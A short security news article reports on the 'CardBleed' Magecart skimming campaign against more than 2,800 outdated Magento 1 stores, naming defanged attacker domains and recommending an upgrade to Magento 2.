Security researchers have recently uncovered a sudden surge in cybercriminal activities involving several online businesses, more than 2800+, to be exact.
These e-commerce merchants have one thing in common – they are all running an outdated version of the Magento platform.
Since September, the attacks have been going on. That’s why security researchers have been keeping a close eye and may have suspected a particular group that is most likely behind the chain of online assaults.
Other analysts have also observed several supply chain attacks that hacked into numerous e-commerce websites all at once. These Magecart attacks, such as the Adverline event, have used the same Magento exploits (software considered outdated since June 2020) used by the merchant victims. These simultaneous attacks were dubbed “CardBleed,” a recently documented attack that leverages the “Magento Connect” function to inject a malware named “mysql.php,” which removes itself as soon as the skimmer codes are added to “prototype.js.”
The group was also credited for the Ant and Cockroach skimmer attacks from August of last year, including the Magento favicon file attack on the website “myicons(dot)net.” The skimmer codes were hidden on fake payment form pages to steal customers’ info and credit card details. Progressively, as soon as one hacking operation is shut down, another one comes in to play, ensuring that the skimming activities are continuous. Security researchers stated that ever since CardBleed was discovered and made public, the hacking group has scrambled and made efforts to make sure their entire operations are mobile and undetected. Their principal skimmer codes and exfiltration process were moved from ajaxcloudflare(dot)com to a recently registered domain – consoler(dot)in.
These innovative efforts have led researchers to believe that the hacking group is continuously evolving, thinking of new ways to invent new skimming processes, and avoiding detection. Acknowledging the almost obsolete nature of Magento 1, the only logical mitigation is to upgrade to Magento 2. That, followed by increased infrastructure security and other safety measures, should help ensure that e-commerce platforms and the online businesses that use them remain operational and safe against possible attacks.